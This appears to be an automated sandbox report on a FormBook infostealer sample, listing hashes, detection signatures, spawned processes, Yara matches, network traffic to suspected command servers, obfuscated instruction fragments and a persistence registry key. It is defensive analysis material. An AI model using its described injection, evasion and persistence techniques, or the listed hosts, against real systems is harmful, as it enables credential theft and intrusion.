# Analysis Report itres.bin

## Overview

### General Information

- Sample Name: itres.bin (renamed file extension from bin to exe)
- Analysis ID: 287347
- MD5: f028d6c9991258c5c75e9f234d4dee79
- SHA1: 2f6b7f76bb4a3342f3450e1cc9ef539c2028c59e
- SHA256: 576f0ed5ae69ececc1bb11492479101c0281af46cb86a73eae9195376ab02717

### Detection

FormBook
- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

System is w10x64

- itres.exe (PID: 2224 cmdline: 'C:\Users\user\Desktop\itres.exe' MD5: F028D6C9991258C5C75E9F234D4DEE79)
- itres.exe (PID: 4468 cmdline: C:\Users\user\Desktop\itres.exe MD5: F028D6C9991258C5C75E9F234D4DEE79)
- explorer.exe (PID: 3384 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- systray.exe (PID: 6068 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
- cmd.exe (PID: 3352 cmdline: /c del 'C:\Users\user\Desktop\itres.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

## Malware Configuration

No configs have been found

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

Multi AV Scanner detection for submitted file

- Source: itres.exe Virustotal: Detection: 56%
- Source: itres.exe ReversingLabs: Detection: 58%

Yara detected FormBook

- Source: Yara match File source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match File source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

- Source: itres.exe Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

- Source: 1.2.itres.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Contains functionality to enumerate / list files inside a directory

- Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E7F460 FindFirstFileW,FindNextFileW,FindClose, 4_2_02E7F460
- Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E7F459 FindFirstFileW,FindNextFileW,FindClose, 4_2_02E7F459
- Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E7F585 FindFirstFileW,FindNextFileW,FindClose, 4_2_02E7F585

Found inlined nop instructions (likely shell or obfuscated code)

- Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then mov ecx, dword ptr [ebp-44h] 0_2_00A5CA70
- Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then jmp 00A5DB82h 0_2_00A5CF79
- Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then pop edi 1_2_00415001
- Source: C:\Users\user\Desktop\itres.exe Code function: 4x nop then pop edi 1_2_0040C119
- Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 4_2_02E85001
- Source: C:\Windows\SysWOW64\systray.exe Code function: 4x nop then pop edi 4_2_02E7C119

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

- Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49739
- Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49741
- Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49743
- Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.5:49751
- Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.5:49755

HTTP GET or POST without a user agent

IP address seen in connection with other malware

- Source: Joe Sandbox View IP Address: 209.99.40.222
- Source: Joe Sandbox View IP Address: 164.132.235.17
- Source: Joe Sandbox View IP Address: 164.132.235.17

Internet Provider seen in connection with other malware

- Source: Joe Sandbox View ASN Name: AS-26496-GO-DADDY-COM-LLCUS
- Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
- Source: Joe Sandbox View ASN Name: CONFLUENCE-NETWORK-INCVG

Uses a known web browser user agent for HTTP communication
 Performs DNS lookups
 Source: unknown DNS traffic detected: queries for: www.brasserie-lafayette.com
 Posts data to webserver
 Source: unknown HTTP traffic detected: POST /d9s8/ HTTP/1.1 Host: www.isabellelinhnguyen.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.isabellelinhnguyen.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.isabellelinhnguyen.com/d9s8/ Accept-Language: en-US Accept-Encoding: gzip, deflate
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 18 Sep 2020 09:01:24 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 857 Content-Type: text/html
 Urls found in memory or binary data

### E-Banking Fraud:

 Yara detected FormBook
 Source: Yara match File source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY
 Source: Yara match File source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE
 Source: Yara match File source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Malicious sample detected (through community Yara rule)
 Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions
 Detected potential crypto function
 Found potential string decryption / allocating functions
 Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 0471B150 appears 145 times
 PE / OLE file has an invalid certificate
 Source: itres.exe Static PE information: invalid certificate
 PE file contains strange resources
 Source: itres.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info
 Source: itres.exe Binary or memory string: OriginalFilename vs itres.exe
 Source: itres.exe, 00000000.00000002.183528208.00000000034AD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAlienRunPE.dll6 vs itres.exe
 Source: itres.exe Binary or memory string: OriginalFilename vs itres.exe
 Source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs itres.exe
 Source: itres.exe, 00000001.00000002.220957412.0000000000E16000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs itres.exe
 Source: itres.exe Binary or memory string: OriginalFilenameGoogle Chrome.exe< vs itres.exe
 Yara signature match
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)
 Source: itres.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@14/9
 Creates files inside the user directory
 Creates mutexes
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_01
 PE file has an executable .text section and no other executable section
 Source: itres.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#)
 Reads the hosts file
 Sample is known by Antivirus
 Source: itres.exe Virustotal: Detection: 56%
 Source: itres.exe ReversingLabs: Detection: 58%
 Spawns processes
 Source: unknown Process created: C:\Users\user\Desktop\itres.exe 'C:\Users\user\Desktop\itres.exe'
 Source: unknown Process created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exe
 Source: unknown Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
 Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe'
 Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 Source: C:\Users\user\Desktop\itres.exe Process created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exe
 Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe'
 Uses an in-process (OLE) Automation server
 Checks if Microsoft Office is installed
 PE file contains a COM descriptor data directory
 Source: itres.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX
 Source: itres.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
 Binary contains paths to debug symbols
 Source: Binary string: systray.pdb source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp
 Source: Binary string: systray.pdbGCTL source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp
 Source: Binary string: wntdll.pdbUGP source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.442081918.00000000046F0000.00000040.00000001.sdmp
 Source: Binary string: wntdll.pdb source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe

### Data Obfuscation:

 Binary contains a suspicious time stamp
 Source: initial sample Static PE information: 0xCD22C4C3 [Sun Jan 22 10:11:15 2079 UTC]
 Uses code obfuscation techniques (call, push, ret)
 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_000D02A1 push es; retf 0_2_000D02F0
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_004148E6 push es; retf 1_2_004148ED
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00414977 push esi; ret 1_2_00414978
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00417C73 push cs; retf 1_2_00417C7E
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_007802A1 push es; retf 1_2_007802F0
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0476D0D1 push ecx; ret 4_2_0476D0E4
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AAF5 push eax; ret 4_2_02E8AB48
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8ABAC push eax; ret 4_2_02E8ABB2
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AB4B push eax; ret 4_2_02E8ABB2
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AB42 push eax; ret 4_2_02E8AB48
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E848E6 push es; retf 4_2_02E848ED
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E849C5 pushfd ; iretd 4_2_02E849C6
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E84977 push esi; ret 4_2_02E84978
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E84E46 push 76AC60C6h; retf 4_2_02E84E4B
 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87C73 push cs; retf 4_2_02E87C7E
 Binary may include packed or encrypted code
 Source: initial sample Static PE information: section name: .text entropy: 7.9315085015

### Boot Survival:

 Creates an undocumented autostart registry key
 Source: C:\Windows\SysWOW64\systray.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run YFIPILCX9DA
 Disables application error messages (SetErrorMode)